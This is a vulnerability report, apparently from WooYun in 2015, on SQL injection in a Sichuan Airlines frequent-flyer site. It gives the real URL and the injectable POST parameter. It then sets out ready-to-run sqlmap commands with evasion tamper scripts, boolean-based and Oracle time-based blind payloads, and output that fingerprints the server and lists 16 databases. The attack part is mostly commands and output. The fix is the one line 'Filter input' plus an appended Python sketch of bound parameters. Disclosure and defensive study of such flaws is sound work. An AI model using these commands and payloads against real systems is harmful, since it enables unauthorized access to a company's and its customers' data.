
SQL injection vulnerability in a Sichuan Airlines site

2015-02-25 23:00

Sichuan Airlines Golden Panda Club

http://ffp.scal.com.cn



POST injection

http://ffp.scal.com.cn/FFPNewWeb/Mall/GetList

POST data:

PageIndex=1&ID=ydcc&PageSize=0&OrderType=NEW (the ID parameter is injectable)





sqlmap -u "http://ffp.scal.com.cn/FFPNewWeb/Mall/GetList" --data "PageIndex=1&ID=ydcc&PageSize=0&OrderType=NEW" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent -p "ID"



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: PageIndex=1&ID=ydcc' AND 8321=8321 AND 'iVwx'='iVwx&PageSize=0&OrderType=NEW

Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: PageIndex=1&ID=ydcc' AND 1200=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(73)||CHR(115)||CHR(119),5) AND 'eKla'='eKla&PageSize=0&OrderType=NEW
---
[13:23:10] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[13:23:10] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[13:23:10] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/ffp.scal.com.cn'







sqlmap -u "http://ffp.scal.com.cn/FFPNewWeb/Mall/GetList" --data "PageIndex=1&ID=ydcc&PageSize=0&OrderType=NEW" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py --random-agent -p "ID" --dbs





available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCAR
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB







Fix:

Filter input.
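
The fix above, sketched as an added example (not code from the original report or from the affected application): the ID value is checked against an allow-list pattern and then passed as a bound parameter instead of being concatenated into the query. The table, column names and ID format are assumptions, and sqlite3 stands in for the Oracle back end; the test value is the boolean-based payload from the sqlmap output above.

```python
import re
import sqlite3

# The ID value from the boolean-based blind payload in the sqlmap output on this page.
PAGE_PAYLOAD = "ydcc' AND 8321=8321 AND 'iVwx'='iVwx"
ID_PATTERN = re.compile(r"[A-Za-z0-9_]{1,32}")  # assumed format of a legitimate ID


def make_db():
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE mall_item (category TEXT, name TEXT)")
    db.executemany("INSERT INTO mall_item VALUES (?, ?)",
                   [("ydcc", "item-a"), ("ydcc", "item-b"), ("other", "item-c")])
    return db


def get_list_vulnerable(db, item_id):
    # Before: the value is concatenated into the SQL text, so a quote inside it
    # closes the string literal and the remainder is parsed as SQL.
    sql = ("SELECT name FROM mall_item WHERE category = '" + item_id
           + "' ORDER BY name")
    return [row[0] for row in db.execute(sql)]


def get_list_bound(db, item_id):
    # Bound parameter: the value is compared as data and never parsed as SQL.
    sql = "SELECT name FROM mall_item WHERE category = ? ORDER BY name"
    return [row[0] for row in db.execute(sql, (item_id,))]


def get_list_hardened(db, item_id):
    # After: allow-list check first (the "filter"), then the bound query.
    if not ID_PATTERN.fullmatch(item_id):
        raise ValueError("ID does not match the expected format")
    return get_list_bound(db, item_id)


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", get_list_vulnerable(db, PAGE_PAYLOAD))
    print("bound:       ", get_list_bound(db, PAGE_PAYLOAD))
    try:
        get_list_hardened(db, PAGE_PAYLOAD)
    except ValueError as exc:
        print("hardened:     rejected,", exc)
```

With concatenation the payload returns the same rows as the plain ID `ydcc`, which is the behaviour sqlmap keyed on; with a bound parameter the same string matches nothing, and the allow-list rejects it before the query runs.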

Source: www.wooyun.org/bugs/wooyun-2015-091192
